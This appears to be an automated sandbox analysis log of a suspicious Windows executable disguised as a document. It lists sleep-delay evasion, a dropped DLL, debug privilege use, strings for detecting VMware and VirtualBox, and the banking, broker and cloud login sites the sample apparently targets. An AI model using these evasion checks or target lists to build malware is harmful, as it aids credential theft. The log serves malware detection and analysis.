                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596358Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595105Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594946Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594842Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594406Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeWindow / User API: threadDelayed 7749Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeWindow / User API: threadDelayed 2093Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dllJump to dropped file
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep count: 40 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096Thread sleep count: 7749 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 1096Thread sleep count: 2093 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -599063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598952s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598389s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -598063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -597047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596358s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -595105s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -594946s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -594842s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -594515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe TID: 6884Thread sleep time: -594406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598952Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598609Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598500Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598389Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598281Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598172Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597938Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597828Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597719Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597594Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597266Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 597047Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596358Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596141Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595688Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595344Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 595105Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594946Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594842Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeThread delayed: delay time: 594406Jump to behavior
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmwaretrat
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vboxservice
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#C:\windows\System32\vboxservice.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3453102350.0000000003D98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmwareuser
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q&C:\windows\System32\Drivers\VBoxSF.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q+C:\windows\System32\Drivers\VMToolsHook.dll
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxGuest.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q'C:\windows\System32\Drivers\Vmmouse.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vboxtrayOC:\windows\System32\Drivers\Vmmouse.sysMC:\windows\System32\Drivers\vm3dgl.dllMC:\windows\System32\Drivers\vmtray.dllWC:\windows\System32\Drivers\VMToolsHook.dllUC:\windows\System32\Drivers\vmmousever.dllSC:\windows\System32\Drivers\VBoxMouse.sysSC:\windows\System32\Drivers\VBoxGuest.sysMC:\windows\System32\Drivers\VBoxSF.sysSC:\windows\System32\Drivers\VBoxVideo.sysGC:\windows\System32\vboxservice.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: Vmtoolsd
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034FEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000035045000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeAPI call chain: ExitProcess graph end nodegraph_0-4347
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeAPI call chain: ExitProcess graph end nodegraph_0-4502
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeCode function: 0_2_6E9B1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E9B1B63
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exeProcess created: C:\Users\user\Desktop\MC8017774DOCS.exe "C:\Users\user\Desktop\MC8017774DOCS.exe"Jump to behavior
